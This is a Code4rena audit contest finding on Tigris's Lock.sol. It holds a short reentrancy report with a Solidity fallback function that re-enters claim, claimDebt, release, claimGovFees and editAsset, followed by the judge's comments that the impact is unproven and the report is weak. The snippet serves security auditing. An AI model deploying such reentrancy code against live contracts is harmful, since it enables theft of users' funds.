Platform: Code4rena
Start Date: 09/12/2022
Pot Size: $90,500 USDC
Total HM: 35
Participants: 84
Period: 7 days
Judge: GalloDaSballo
Total Solo HM: 12
Id: 192
League: ETH
Rank: 58/84
Findings: 1
Award: $100.62
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: unforgiven
Also found by: 0xsomeone, KingNFT, debo, hihen, mookimgo, rotcivegaf, stealthyz, wait
100.6152 USDC - $100.62
Reentrancy using fallback to call functions called claim, claimDebt, release, claimGovFees, and editAsset from attack file.
sourcecode: https://github.com/code-423n4/2022-12-tigris/blob/main/contracts/Lock.sol
attack sourcecode: https://github.com/gbadebosmith/ouch/blob/main/AttackLock.sol
    fallback() external payable {
        if (address(locki).balance >= 1 ether) {
            locki.claim(1234567890);
            locki.claimDebt(0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6);
            //locki.lock(_asset, _amount, _period);
            //locki.extendLock(_id, _amount, _period);
            locki.release(1234567890);
            locki.claimGovFees();
            locki.editAsset(0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6, true);
            //locki.sendNFTs(0x0011111111111111111111111111);
        }
    }
Remix IDE
#0 - GalloDaSballo
2022-12-19T00:35:35Z
Same as the other submission, missing impact, unclear if there's any economic value to be extracted from the reEntrancy
#1 - GalloDaSballo
2022-12-22T02:45:31Z
Not happy with submission quality, will award 50%
I think you got the chops to code, you have to improve your report quality though
#2 - c4-judge
2022-12-22T02:45:53Z
GalloDaSballo marked the issue as duplicate of #400
#3 - c4-judge
2022-12-22T02:45:58Z
GalloDaSballo marked the issue as partial-50